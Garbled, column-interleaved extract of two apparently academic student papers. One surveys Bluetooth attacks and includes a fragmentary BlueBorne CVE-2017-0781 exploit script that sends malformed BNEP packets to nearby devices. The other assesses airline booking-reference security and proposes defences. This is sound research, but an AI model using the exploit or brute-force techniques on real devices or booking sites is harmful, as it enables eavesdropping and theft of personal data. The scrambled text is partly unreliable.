mentation which has no less than 4 different layers imple- ging accesses and uses all phone features but is limited by
mented throughout the stack. The absurdity goes even fur- the transmitting power of Class 2 Bluetooth radios, normally
ther as a packet will be fragmented by the SDP continuation capping its range at 10-15 meters. However, the operational
mechanism, and then by L2CAP’s segmentation mechanism, range has been increased with the advent of directional an-
and then again by Asynchronous Connection-Less (ACL) tennas.” [9]
continuation, and one last time by the fragmentation mech-
anism done the Link Controller. [2]
2.2.5 Helomoto
The sheer complexity of the stack creates an enormous at- “The HeloMoto attack has been discovered by Adam Lau-
tack vector, which, over the years, has been exploited in rie and is a combination of the BlueSnarf attack and the
many ways. BlueBug attack. The attack is called HeloMoto, since it was
discovered on Motorola phones. The HeloMoto attack takes
advantage of the incorrect implementation of the ’trusted
2.2 Historical Bluetooth Attacks device’ handling on some Motorola devices. The attacker
In the past, Bluetooth has been attacked in many ways. We initiates a connection to the unauthenticated Object Ex-
enumerate some of them below, as listed by [4, 5]: change (OBEX) Push Profile pretending to send a vCard.
The attacker interrupts the sending process and without in-
2.2.1 Bluejacking teraction the attacker’s device is stored in the ’list of trusted
“The practice of using Bluetooth-enabled mobile phones to devices’ on the victim’s phone. With an entry in that list,
send unsolicited messages to other Bluetooth-enabled mobile the attacker is able to connect to the headset profile with-
phones within a transmission range of 10 meters. A content out authentication. Once connected to this service, the at-
gp11
PDFsam_merge 86
90
tacker is able to take control of the device by means of AT- 3. EXPLORATION
commands (as BlueBug).” [10] In this section, we cover our journey how we explored Blue-
tooth and various attempts and experimentation carried out
2.2.6 DirtyTooth to hack it.
“There is a trick or hack for iOS 10.3.3 and earlier and iOS 11
beta 4 that takes advantage of the management of the pro- 3.1 Bluetooth Vulnerabilities
files causing impact on the privacy of users who use Blue- Bluetooth may seem to provide an excellent choice to meet-
tooth technology daily. From the iOS device information ing our daily needs but its not without its problems. Blue-
leak caused by the incorrect management of profiles, a lot tooth is far from being a secure technology and its implemen-
of information about the user and their background may be tation leaves much to be improved. It has faced numerous
obtained. security issues and increasing risks to attacks despite having
security features since 2001 [5, 14].
“When the iOS system detects a Bluetooth signal, the user
can visualize the device with which it wants to connect and a Here are some vulnerabilities which affects it:
scenario like the following will be observed. The speaker that
appears in the Bluetooth discovery is announcing the A2DP
profile, a profile to play audio via the Bluetooth connection. 1. The packet headers (which are plaintext) contain enough
When the user clicks on it, the pairing is completed, with no information from which the Bluetooth MAC addresses
need for a PIN in versions Bluetooth 2.1 or higher. After a (BDADDRs) of communicating devices can be derived.
few seconds, the speaker Bluetooth can change its profile to a If a machine generates any Bluetooth traffic, an at-
Phone Book Access Profile (PBAP) profile. If this happens, tacker in physical proximity can derive its BDADDR
iOS will perform the profile change without displaying any and use it to send unicast traffic to the device. [2, 15]
type of notification to the user. 2. If the device generates no Bluetooth traffic, and is only
listening, it is still possible to ”guess” the BDADDR,
“Note the existence of a weakness or an accessibility config- by sniffing its WiFi traffic. This is viable since WiFi
uration extra in iOS. When the profile change is carried out MAC addresses appear unencrypted over the air and
without notification, the synchronization of contacts is en- due to the widely accepted norm of OEMs and hard-
abled by default, giving access to it. In other words, Dirty- ware manufacturers that the MACs of internal Blue-
Tooth is a trick or hack that can take advantage of this tooth/WiFi adapters are either the same, or only differ
accessibility configuration.” [11] in the last digit (one being +1 of the other). [2, 15]
gp11
PDFsam_merge 87
91
3. We attempted to install Blueborne on the Ubuntu Sub- 4.1 Hardware
system for Windows 10, which worked; we were not, 4.1.1 Adafruit BLESniffer
however, able to snoop Bluetooth signals using this The Adafruit Bluetooth Low Energy Sniffer is capable of
technique. We suspect that this might be because the passively capturing data exchanges between two Bluetooth
Ubuntu Subsystem does not have proper access to the Low Energy devices, and push that data into Wireshark. It
laptop’s Bluetooth receiver. also adds useful descriptors to avoid having to examine the
4. We discovered that Bluetooth LE may not be applica- long Bluetooth spec. The device only works for Bluetooth
ble to devices delivering the A2DP audio. Such devices LE, not for other implementations of Bluetooth [22].
rely only on the Bluetooth Basic Rate (BR) or Classic
protocol. 4.1.2 Ubertooth One
Ubertooth One is an open source 2.4 GHz wireless develop-
5. We attempted to do some snooping on Actxa Stride+ ment platform for Bluetooth experimentation [23]. It has
Steps Tracker [18] using the Adafruit Bluetooth Low the following features [24]:
Energy sniffer. We have managed to successfully cap-
ture packets due to its ’always visible’ status and all
information between the host and step tracker was in- 1. 2.4 GHz transmit and receive.
tercepted.
2. Transmit power and receive sensitivity comparable to
However, as there is no audio involved in device, no a Class 1 Bluetooth device.
further investigation was carried out for this attempt.
3. Standard Cortex Debug Connector (10-pin 50-mil JTAG).
6. We attempted to install Blueborne in a virtualised en-
vironment using Oracle VM VirtualBox. Thanks to 4. In-System Programming (ISP) serial connector.
Kali Linux, we also discovered various tools which al-
lows us to discover vulnerabilities onto Bluetooth. 5. Expansion connector: intended for inter-Ubertooth com-
munication or other future uses.
We will cover this in detail under Section 4.2.3. All
attempts carried out after this mandates the use of a 6. Six indicator LEDs.
Bluetooth USB adapter.
7. We attempted to use Carwhisperer on a phone and 4.1.3 Nordic Semiconductor nRF51 DK
headset with limited success. The nRF51 DK is “The nRF51 DK is a low-cost, versatile
single-board development kit for BluetoothÂő low energy,
A detailed Proof-of-Concept (PoC) is covered under ANT and 2.4GHz proprietary applications [which is] com-
Section 5.1. patible with the Arduino Uno Revision 3 standard, making
8. We attempted to install Kali Linux on the Raspberry it possible to use 3rd-party shields that are compatible to
Pi 3 (RPi3). However, this ended not fruitful as the this standard with the kit” [25].
OS is not optimised for performance. We had to in-
stall Re4son-Kernel, which provided support for built- 4.1.4 Ellisys Bluetooth Explorer
in WiFi and Bluetooth. [19] The Ellisys Bluetooth Explorer is “Industry’s First and Only
All-In-One Wideband BR/EDR and Low Energy sniffer with
9. Much to our dismay, the delivery of the Blueborne ex- concurrent capture of Wi-Fi, 2.4 GHz spectrum, HCI, WCI-
ploit requires the use of a 64-bit system as pwntools, a 2, logic signals, and Audio I2S” [26].
CTF framework and exploit development library writ-
ten in Python. A 64-bit operating system is required
for it to work. [20] 4.2 Software
4.2.1 Bluez
10. We came across pi64, an experimental 64-bit OS named
pi64 is installed on the RPi3. pi64 is based on Debian
Stretch and backed by a 4.11 Linux kernel. Its first re-
lease only debuted on March 2017, based on Debian
Jessie. [21] As this is an experimental OS, support
for Bluetooth is not included and a Bluetooth USB
adapter has to be used to obtain Bluetooth function-
ality.
A detailed PoC is covered under Section 5.2.
4. TOOLS
Figure 2: l2ping performed on various BDADDRs
In this section, we list down various tools and options avail-
in Kali Linux
able which made Bluetooth exploitation possible.
The basic tools included in Bluez to manage Bluetooth in-
clude hciconfig, hcitool, sdptool, etc. In particular, hcitool
allows us to inquire about the a device’s details, such as the
device MAC address, name and class. sdptool checks for
gp11
PDFsam_merge 88
92
the services provided by the device (e.g. Handsfree Audio, We used Kali Linux to perform an attack using Carwhis-
etc). gatttool grabs specific values of a General Attribute, perer. Our target was a Samsung Galaxy S7 and our goal
or GATT characteristic as defined in the Bluetooth specifi- was to record all audio input to the target victim and save
cation. l2ping (see Figure 2) is a Bluetooth discovery tool it in a .raw output file. The steps are as follows:
which depoly pings to devices to see if it is alive.
4.2.4 Crackle
Aimed at Bluetooth LE, crackle exploits a flaw in the BLE
pairing process that allows an attacker to guess or very
quickly brute force the TK (Temporary Key). With the
TK and other data collected from the pairing process, the
STK (Short Term Key) and later the LTK (Long Term Key)
can be collected.
Figure 3: Carwhisperer running on a Bluetooth
With the STK and LTK, all communications between the headset with AT commands being sent
master and the slave can be decrypted. [28]
We also performed an attack on a recently purchased Blue-
5. PROOF OF CONCEPT tooth headset (see Figure 3), which claims to support Blue-
In this section, we cover on our attempts to attack Bluetooth tooth v4.1, directly works with Carwhisperer on RFCOMM
and the usage of available code and various tools to our channel 1 with its PIN defaulted to ’0000’ (set by the manu-
advantage. facturer) and simply allowed communication. However, the
headset unpairs itself from the host device, which we are
5.1 Carwhisperer v2.0 with Real-Time Audio unable to obtain any exchange of vocal communication be-
tween the host and the slave device (headset).
Our investigations found there were previous attempts to
eavesdrop Bluetooth headsets back in 2005, named Car-
Despite this, the headset continues to communicate with
whisperer. [29] It is aimed at manufacturers of carkits and
Carwhisperer and reports AT+BRSF and AT+VGM com-
other headless Bluetooth appliances for the possible secu-
mands at will. These commands are simply modem com-
rity threat evolving from the use of standard passkeys. A
mands. [32] This should not be the case as the microphone
real-time patch was also released to enable audio output si-
has been compromised and the adversary is still able to per-
multaneously. [30, 31]
form eavesdropping on the device.
gp11
PDFsam_merge 89
93
Even so, we are unable to decode the audio as Carwhisper Address Space Layout Randomization (ASLR) mitigation
generates raw files and requires processing. The documen- can be achieved as well. Pointers that are leaked from the
tation for Carwhisperer explicitly requires the use of the stack can be used to allow an attacker to learn the base ad-
legacy OSS (Open Sound System) as part of SoX (Sound dresses of the various sections of the Bluetooth process, and
eXchange) parameters. these can be used by an attacker to elevate one of the heap
overflow vulnerabilities to reliable code control. [2, 36, 37]
Thus, we are unable to obtain anything that is concrete from
the slave device. All attempts of using different parameters Although this experimentation leaks unintended informa-
in SoX, and emulation of the OSS in ALSA and PulseAudio tion, demonstrates the overflow and the ability of crashing
has been exhausted and proven unfruitful. the Bluetooth service, it can be elevated to a remote code
execution.
5.2 Raspberry Pi 3
We earlier mentioned the Blueborne exploit [13] and its ef- Not to mention, the RPi3 is also fully capable of deploying
fectiveness as a zero-day vulnerability. Allow us to place this Carwhisperer (See Section 5.1) or GATTack [12].
context into a popular small computing device, the RPi3.
Through this, the RPi3 serves as a powerful tool which
allows easy exploitation of Bluetooth vulnerabilities with-
out the need of a full-sized laptop computer in the outside
world.
The RPi3 has evolved since its predecessors and is pow- This paper has not highlighted the dangers nor performed
ered by the Broadcom BCM2837 SoC, delivering a quad- exploitation via return-oriented programming (ROP) on An-
core ARM Cortex A53 (ARMv8) cluster. The ARM cores droid devices and could serve as an extension to future work
run at 1.2GHz, making the device about 50% faster than [38].
the Raspberry Pi 2. [33]
7. REFERENCES
Being credit-card-sized, its performance/portability is un- [1] Bluetooth Core Specification, Bluetooth SIG, Inc,
matched and can be used as an headless or walking hacking December 2016, v5.0.
device while discreetly being kept away from sight. We have [2] B. S. . G. Vishnepolsky, “Blueborne technical white
made a prototype which delivers the payload or steal in- paper,” Armis Labs, Tech. Rep., 2017.
formation to victims who have left their Bluetooth devices [3] E. T. S. Institute, “Etsi ts v7.1.0,” 1999. [Online].
which are unintentionally discoverable. Available:
http://www.etsi.org/deliver/etsi ts/101300 101399/
However, the delivery of the Blueborne exploit requires the 101369/07.01.00 60/ts 101369v070100p.pdf
use of a 64-bit system as pwntools will not compile on 32- [4] D. Browning and G. C. Kessler, “Bluetooth hacking:
bit systems. To overcome this, an experimental 64-bit OS A case study,” in Proceedings of the Conference on
named pi64 is installed on the RPi3.
Digital Forensics, Security and Law. Association of
Digital Forensics, Security and Law, 2009, p. 115.
A python script (Appendix A) is written using the pybluez
[5] J. Padgette, “Guide to bluetooth security,” NIST
and pwntools libraries to deliver a heap overflow vulnerabil-
Special Publication, vol. 800, p. 121, 2017.
ity to Android devices [34, 35] to unsuspecting victims.
[6] J. Thom-Santelli, A. Ainslie, and G. Gay, “Location,
The script exploits the the code flow that handles incoming location, location: a study of bluejacking practices,” in
BNEP control messages. CVE-2017-0781 abuses the mem- CHI’07 extended abstracts on Human factors in
cpy function call in BNEP FRAME CONTROL (A switch computing systems. ACM, 2007, pp. 2693–2698.
case for BNEP control messages), causing a buffer over- [7] A. Laurie, M. Holtmann, and M. Herfurt,
flow. [2, 35] “Bluesmack,” 2004. [Online]. Available:
https://trifinite.org/trifinite stuff bluesmack.html
With the combination of the SDP information disclosure [8] Wikipedia, “Bluesnarfing — wikipedia, the free
vulnerability (CVE-2017-0785), a complete bypass of the encyclopedia,” 2017, [Online; accessed
gp11
PDFsam_merge 90
94
9-November-2017]. [Online]. Available: [29] M. Herfurt. (2005) Carwhisperer. [Online]. Available:
https://en.wikipedia.org/w/index.php?title= https://trifinite.org/trifinite stuff carwhisperer.html
Bluesnarfing&oldid=791752785 [30] (2011) Bluetooth penetration testing framework.
[9] ——, “Bluebugging — wikipedia, the free [Online]. Available: http://bluetooth-pentest.narod.ru
encyclopedia,” 2017, [Online; accessed [31] B. Ballmann, “bluedivingng - next generation
9-November-2017]. [Online]. Available: bluetooth security tool,” 2011. [Online]. Available:
https://en.wikipedia.org/w/index.php?title= https://github.com/balle/bluediving
Bluebugging&oldid=801398150 [32] Trolltech. (2009) Modem emulator - control and
[10] A. Laurie, “Helomoto attack.” [Online]. Available: status. [Online]. Available: https://radekp.github.io/
ALDigitalLtd.https: qtmoko/api/modememulator-controlandstatus.html
//trifinite.org/trifinite stuff helomoto.html [33] (2016) Raspberry pi 3 is out now! specs, benchmarks
[11] S. Telefonica Digital Espana, “Dirtytooth.” [Online]. |& more. [Online]. Available:
Available: http://dirtytooth.com/ https://www.raspberrypi.org/magpi/
[12] S. Jasek, “Gattacking bluetooth smart devices,” raspberry-pi-3-specs-benchmarks
SecuRing, Tech. Rep., 2017. [34] K. Ojasoo, “Blueborne cve-2017-0781 android heap
[13] A. Labs, “Blueborne information from the research overflow vulnerability poc,” 2017. [Online]. Available:
team.” https://github.com/ojasookert/CVE-2017-0781
[14] K. Haataja, K. Hyppönen, S. Pasanen, and [35] M. Corporation, “Cve-2017-0781,” 2017. [Online].
P. Toivanen, Bluetooth Security Attacks: Comparative Available:
Analysis, Attacks, and Countermeasures, ser. http://www.cvedetails.com/cve/CVE-2017-0781
SpringerBriefs in Computer Science. Springer Berlin [36] ——, “Cve-2017-0785,” 2017. [Online]. Available:
Heidelberg, 2013. [Online]. Available: https: http://www.cvedetails.com/cve/CVE-2017-0785
//books.google.com.sg/books?id=gTNRnwEACAAJ [37] K. Ojasoo, “Blueborne cve-2017-0785 android
[15] T. O’Connor, Violent Python: a cookbook for hackers, information leak vulnerability poc,” 2017. [Online].
forensic analysts, penetration testers and security Available:
engineers. Newnes, 2012. https://github.com/ojasookert/CVE-2017-0785
[16] T. Baumeister, “Analysis of bluetooth protocol [38] L. Davi, A. Dmitrienko, A.-R. Sadeghi, and
security,” Ph.D. dissertation, University of M. Winandy, “Privilege escalation attacks on android,”
Wisconsin–La Crosse, 2010. in International Conference on Information Security.
[17] Y. Lu, W. Meier, and S. Vaudenay, “The conditional Springer, 2010, pp. 346–360.
correlation attack: A practical attack on bluetooth
encryption,” in Crypto, vol. 3621. Springer, 2005, pp.
97–117.
[18] Actxa, “Actxa stride+,” 2016. [Online]. Available:
http://actxa.com/sg/stride-plus/
[19] Re4son. (2017) Re4son-kernel for raspberry pi
1/2/3/zero/zero w. [Online]. Available:
https://whitedome.com.au/re4son/re4son-kernel
[20] Z. Riggle, “Pwntools does not work on 32-bit ubuntu,”
2015. [Online]. Available:
https://github.com/Gallopsled/pwntools/issues/518
[21] B. Amarni, “A 64-bit os for the raspberry pi 3,” 2016.
[Online]. Available: https://github.com/bamarni/pi64
[22] Adafruit, “Bluefruit le sniffer,” 2017. [Online].
Available: https://www.adafruit.com/product/2269
[23] G. S. Gadgets, “Ubertooth one,” 2017. [Online].
Available:
https://greatscottgadgets.com/ubertoothone/
[24] ——, “Project ubertooth - ubertooth one,” 2017.
[Online]. Available:
http://ubertooth.sourceforge.net/hardware/one/
[25] N. Semiconductors, “nrf51,” 2017. [Online]. Available:
https:
//www.nordicsemi.com/eng/Products/nRF51-DK
[26] Ellisys, “Ellisys - bluetooth explorer,” 2017. [Online].
Available: https://www.ellisys.com/products/bex400/
[27] T. W. Wiki, “Capturesetup/bluetooth,” 2017. [Online].
Available:
https://wiki.wireshark.org/CaptureSetup/Bluetooth
[28] M. Ryan, “Crack and decrypt ble encryption,”
https://github.com/mikeryan/crackle, 2016.
gp11
PDFsam_merge 91
95
APPENDIX 34
48 l o g . i n f o ( ’ Sending BNEP
This setup also uses a widely available CSR (Cambridge
packets . . . ’ )
Silicon Radio) v4.0 Bluetooth dongle.
49 f o r i i n r a n g e ( count ) :
50 s o c k . send (
The code is as follows:
bad packet )
1 from pwn import ∗ 51
2 import b l u e t o o t h 52 log . success ( ’ Success ! ’ )
3
53 sock . c l o s e ( )
4 count = 30 # Amount o f p a c k e t s t o send
5
6 p o r t = 0 x f # BT PSM BNEP
7 c o n t e x t . a r c h = ’ arm ’
8 BNEP FRAME CONTROL = 0 x01
9 BNEP SETUP CONNECTION REQUEST MSG = 0 x01
10
29 b a d p a c k e t = p a c k e t ( ’AAAABBBB ’ )
30
31 while (1) :
32 nearby devices = bluetooth .
d i s c o v e r d e v i c e s ( lookup names=F a l s e )
33 l o g . i n f o ( ’ Found %d d e v i c e s ’ % l e n (
nearby devices ) )
gp11
PDFsam_merge 92
96
Evaluation of the Security of Airline Booking Systems
Lu Yuehan Matthieu Marie Emmanuel Buot Tan Xue Si
National University of Singapore De L'Epine National University of Singapore
13 Computing Drive National University of Singapore 13 Computing Drive
Singapore 117417 13 Computing Drive Singapore 117417
+65 6516 2727 Singapore 117417 +65 6516 2727
a0119387@u.nus.edu +65 6516 2727 xuesi.tan@u.nus.edu
e0216175@u.nus.edu
Tay Keming Justin Wong Kang Fei
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
+65 6516 2727 +65 6516 2727
justintay@u.nus.edu kfwong@u.nus.edu
ABSTRACT
With the recent growth in demand in the aviation industry, people
1. INTRODUCTION
There has been an increasing trend in passenger growth in
are entrusting their personal data to airlines and attached to their
the aviation industry in recent years, with passenger demand
flight bookings in exchange for an uninterrupted flight experience.
forecasts to double in 20 years and a year on year growth of 7.4%
It is vital that these passenger data are kept private and
in both 2016 and 2017. [1] [2]
confidential, for only intended recipients to view. This paper
seeks to analyse how secure booking codes used by airlines are, This roughly translates to an increase in the number of people that
and the measures put in place by airlines on their websites on the can afford air travel and in the process of booking the tickets to
retrieval of booking records. The findings are presented with their next travel destination, have provided the airlines of their
proposed solutions, to allow for more secure systems to be built. choice with some of their personal data. These personal data
include and are not limited to information such as the passenger’s
Categories and Subject Descriptors name, email address, passport information and the payment
K.6.5 [Security and Protection]: Miscellaneous method used to pay for their tickets.
This increasing demand has also transformed into a force
General Terms accelerating changes in the aviation industry, to cope with the
Security increase in demand and more notably, ensure passengers with a
peace of mind while travelling. Most media coverage or noted
implementations to air travel safety have been on improvements in
Keywords general, such as facilitating airport security checks. [4] Other
Airlines, Aviation, Booking systems, GDS, Global Distribution improvements like flight upgrades stems from lessons learnt from
Systems, Amadeus, Sabre, Travelport past incidents in the industry, like the disappearance of flight
Malaysia Airlines flight 370 which has prompted upgrades to
flight tracking equipment. [5]
Yet, there has not been much coverage or noted improvements in
software or cybersecurity for the aviation industry, which is one of
the top priorities as well. [3] This is in view technical incidents,
such as the check-in systems, or cyber-attacks that have been
made on the industry. [6] [7]
One could argue that with technological advancements, the
software, and related cybersecurity measures put in place by
airlines needs to be constantly updated and tested to ensure the
integrity of their networks and protect consumer data. Yet, there is
not as much focus from news or other media outlets on the
improvements to such technical systems of airlines, despite the
numerous technical glitches that have been experienced. [9]
2. MOTIVATION
With the advent of big data and digital advertising, consumers’
personal data is now pegged with a price tag which is estimated to
be £3,241. [8] Considering this and the personal information that
gp12
PDFsam_merge 93
97
consumers are passing on to airlines, it is important for these data maintain the fares and availability of tickets from airlines and
to be kept private and secure to a certain extent. reservations created by passengers.
Moreover, the earliest airline booking systems go all the way back There are three main GDS players in the global market currently:
to the 1960s, which is utilized by most, if not all, airlines in
generating booking references. [10] Thus, these systems may not 3.2.1 Amadeus
provide sufficient security by modern standards to safely protect Amadeus was founded by a group of airlines in 1987, namely Air
consumer data. France, Iberia, Lufthansa and Scandinavian Airlines. It is the
second main player in the GDS market, with 19.7% of the market
This paper aims to explore and test the security that airlines have share. [12] It has since grown and acquired Navitaire back in
in place for the retrieval of bookings using booking reference 2016, another GDS system which was mainly used by budget
codes generated for each booking that a passenger makes. carriers. [13]
3.2.3 Travelport
Travelport is the youngest of the main GDS players, due to the
later founding and the acquisition of other smaller rival GDS
systems such as Galileo and Worldspan. It currently owns
approximately 20% of the market share. [12]
gp12
PDFsam_merge 94
98
it is important to limit the access to these PNRs and provide
sufficient security measures to protect the information contained.
4. ISSUES
Most airlines these days provide a form for managing bookings,
and while different airlines may have slight differences in the
information required to retrieve a booking, most can still be
retrieved using only the PNR locator or booking reference,
coupled with the passenger’s last name for that booking.
This authentication measure is similar to a password-based
authentication system, except that these ‘passwords’ cannot be
changed by the user and are shared between different parties, such
as the airline, travel agents and GDS staff. This forms a very weak
authentication measure by modern standards.
Besides the susceptibility of brute forcing the PNR locator with an
associated last name, the PNR can be gathered both online or
offline, through various means such as searching through social
media, or capturing baggage tags in the airports.
gp12
PDFsam_merge 95
99
malicious attacker may create and send phishing emails to its 4. Ability to check on bookings made with other airlines
identified target from the PNR to trick its unknowing victim into
Being able to check on bookings made with other airlines poses
disclosing other confidential information.
an additional vulnerability or loophole for attackers to utilize, as
they can bypass additional safeguards set in place by other sites
5. TESTING and use one with lower security standards to conduct their
In view of the issues present, it is important to ensure that attacks.
booking retrieval systems are sufficiently secure to minimize the
probability of occurrence of such incidents highlighted
previously.
We first identify the issues that may be present in the booking
retrieval systems on current airline websites, before proposing
solutions that may help to mitigate against unwanted attacks.
For our testing purposes, we have scoped the airlines to those that
are more relevant in the context of Singapore, limiting ourselves
to a total of 10 different airlines. Our basic analysis comprises of
30 valid and 30 invalid requests to trigger the system. Valid
requests were done using our relatives and/or friends’ valid
bookings (with permission), while invalid requests were randomly
generated values meant to trigger the different measures these
sites have in place.
The testing framework involves two types of tests, visual and non-
visual tests. The results are presented in a tabular format in their
Figure 7 Example of checking booking on another airline
respective subsections.
gp12
PDFsam_merge 100
96
From our visual testing results, we can see that most airline sites Table 2 Non-visual testing results
have similar defence mechanisms, aside from JetStar, Malaysia
Airline Thrott- Loading Code Local SQL
Airlines and Qantas having weaker defences. However, a notable
ling times on obfus- input Inject-
factor would be the lack of captchas and IP bans on these sites
valid vs. cation tests ion
despite multiple requests that would be more than necessary to
invalid
deem them as suspicious.
inputs
5.2 Non-Visual Testing AirAsia ✕ - ✕ ✕ ✕
For the non-visual testing, it relates to underlying processes and Cathay ✕ 400ms ✓ ✕ ✕
additional functional attributes, which may require additional Pacific
inputs, such as checking on the vulnerability to SQL injection,
rate throttling and code obfuscation. JetStar ✕ 200ms ✓ ✕ ✕
3. Code obfuscation
From the non-visual test results, a direct relation can be drawn
Code obfuscation relates to altering of function and variable
from the weaker sites identified in the visual test section. From the
names in code on the web pages, such as renaming all
combined results, we can classify these sites into different groups
JavaScript functions. However, this does not include the
depending on their overall defence mechanisms, which are
minifying of code.
provided below:
Rank Airlines
4. Local input testing
High AirAsia, Korean Air, SilkAir, Singapore
Local input testing refers to the transference of hashed data from
Airlines
the remote server for local processing to reduce bandwidth
consumption. For instance, when a valid booking reference but Medium Cathay Pacific, Scoot, Thai Airways
incorrect last name is requested and the server provides a
hashed version of the other inputs to be verified against locally. Low JetStar, Malaysia Airlines, Qantas
5. SQL injection
SQL injection vulnerability of the website, which may enable
6. SOLUTIONS
After analysing the various sites, we would like to propose the
additional data to be stolen by a malicious attacker if such
following implementations as a means of complementing the
vulnerability is present. This is an assumption to test if any of
current security measures to better protect a booking retrieval
the commands are executed against a SQL database on the
system.
backend.
gp12
PDFsam_merge 101
97
6.1.2 Valid and invalid information loading time 7. CONCLUSION
One of the reasons that airlines might opt to check the invalidity With the results from the testing on various airline sites, it is
of the codes before accessing their database would be to reduce evident that the current defences and measures in place are mainly
load on the database. However, this can leak some information to build upon and protect the weak key strength provided by the
about the invalidity to the user. One simple solution that we came PNR.
up with is to simply store 5 of the latest database access times -
the amount of time it took to retrieve the data - on a file in the These different measures are unable to provide sufficient
web server. This reduces load, as well as giving the illusion that safeguards against attacks on the booking retrieval system, due to
the database was also accessed given an invalid code, thereby varying flaws. Moreover, the different variations of
normalizing the load times and prevents attackers from gaining implementations to the interfaces of these booking retrieval
any insights. systems may leave multiple vulnerabilities to be exploited, as the
fixes on one interface may not be applied onto another, thus
6.1.3 IP Bans leaving the unpatched interface still exploitable.
On top of using captchas, these airlines sites could also implement The main underlying issue relates back to the PNR system, and its
IP or MAC address banning depending on the request load a weak key strength. While additional defences can be developed
suspicious user puts on the server. These bans could be and implemented to patch existing vulnerabilities or reinforce
incremental as well, such as a temporal ban of 5 minutes, 30 security, it would reach a breaking point in which the number of
minutes to a day and then permanent bans if the user does not patches would saturate and it would not be cost beneficial to
relent on the server. This would be rendered useless when continue building upon the system.
multiple IP addresses are used, in which other measures would
have to be implemented in conjunction to counter the attacks, if This drives the proposal for modifying or replacing the system to
any. match modern standards in terms of security requirements.
Although costs of replacing the system would be exorbitant, it
6.1.4 Limit Access would be beneficial to replace the system at an earlier stage,
Limiting the access of a user is another measure to be considered. compared to a later stage whereby costs may be influenced by
This would be in the form of limiting the scope of the reference additional factors, such as the data.
checks, and to prevent cross airline checks if the travel details do
not contain the current airline. Moreover, additional mechanisms
may be implemented for other actions when managing a booking,
8. REFERENCES
[1] Anon. 2016. IATA Forecasts Passenger Demand to Double
such as for the refund or altering of flight details.
Over 20 Years. (October 2016). Retrieved November 1, 2017
from http://www.iata.org/pressroom/pr/Pages/2016-10-18-
6.2 Non-Visual Aspects 02.aspx
6.2.1 Preventing SQL Injection
One of the easiest ways is to use prepared statements, which are
the libraries provided by the database and languages. This works [2] Anon. 2017. Growth of global air traffic passenger demand
because the values are transmitted separately using a different 2017 | Statistic. (2017). Retrieved November 1, 2017 from
protocol and therefore need not be sanitised. https://www.statista.com/statistics/193533/growth-of-global-
air-traffic-passenger-demand/
6.2.2 Increasing Brute-force Difficulty
Currently, most airlines make use of a 6-alphanumeric capital-
[3] Gloria Gerstein. 2016. Exploring cybersecurity risks within
only reference number. Airlines mostly retain this system due to
the airline industry. (June 2016).
ease of use for their customers. With a size of 36, this results in
366 = 2,176,782,336 different combinations. With usability in
mind, we can make some minor changes, such as include lower- [4] Chabeli Herrera. 2017. Traveling for the holidays? Your trip
case alphabets - this increases the combinations to (26+36)6 = through Miami airport security could be faster than before.
56,800,235,584. To increase it even further, we can increase the (October 2017). Retrieved October 25, 2017 from
length to 8 - 628 = 218,340,105,584,896; this is a huge increase in http://www.miamiherald.com/news/business/article18068801
the combinations. 1.html
6.2.3 Preventing Multiple Tries
The airlines we tested don’t have any measures to mitigate [5] David Noland and Barbara Peterson. 2017. 12 Plane Crashes
multiple requests from a single internet user. Again, we That Changed Aviation. (November 2017). Retrieved
understand that this is for the customers’ ease-of-use. However, November 7, 2017 from
we can foresee that an attacker can DDoS the database just by http://www.popularmechanics.com/flight/g73/12-airplane-
sending multiple retrievals. This can be easily prevented by crashes-that-changed-aviation/
setting a delay on the IP/MAC address proportional to the times
accessed, e.g. Delay = (2 seconds) (number of accesses). Another method
is just preventing any more tries after a certain threshold, e.g. 30
tries.
gp12
PDFsam_merge 102
98
[6] Anon. 2017. World airport system crash sparks chaos.
(September 2017). Retrieved November 1, 2017 from [11] Richard L. Johnson. 2002. Global Distribution Systems in
http://www.news.com.au/travel/travel- Present Times . (October 2002). Retrieved November 2,
updates/incidents/international-airports-hit-by-computer- 2017 from http://www.hotel-
system-crash/news- online.com/News/PR2002_4th/Oct02_GDS.html
story/3c82e6e312223ee279c9256725fc5a9a
[12] Anon. 2017. GDS market shares and more. (May 2017).
[7] Jorge Valero. 2016. Hackers bombard aviation sector with Retrieved November 2, 2017 from
over 1,000 attacks per month. (July 2016). Retrieved https://www.businesstravel-iq.com/article/2017/05/11/gds-
November 2, 2017 from market-shares-and-more
https://www.euractiv.com/section/justice-home-
affairs/news/hackers-bombard-aviation-sector-with-more-
than-1000-attacks-per-month/ [13] Anon. 2016. Amadeus completes acquisition of Navitaire.
Amadeus (January 2016).
[8] Sophie Curtis. 2015. How much is your personal data worth?
(November 2015). Retrieved November 2, 2017 from [14] ICAO. 2010. Guidelines on passenger name record (PNR)
http://www.telegraph.co.uk/technology/news/12012191/How data, Montréal, Quebec: International Civil Aviation
-much-is-your-personal-data-worth.html Organization.
[9] David Yanofsky. 2015. There has been another airline glitch. [15] Anon. Manage booking. Retrieved November 3, 2017 from
(October 2015). Retrieved November 2, 2017 from https://www.qantas.com/sg/en/manage-booking.html
https://qz.com/535967/tech-glitches-keep-plaguing-us-
airlines-this-dashboard-keeps-track-of-them-all/
[16] Anon. About manage booking. Retrieved November 3, 2017
from https://www.cathaypacific.com/cx/en_SG/manage-
[10] Mark Warner, Donna Quadri Felitti, and Priya V. booking/manage-booking/about-manage-booking.html
Chandnani. 2010. A History of Travel Distributi on: 1915 -
2009, HEDNA.
gp12
PDFsam_merge 103
99
PDFsam_merge 104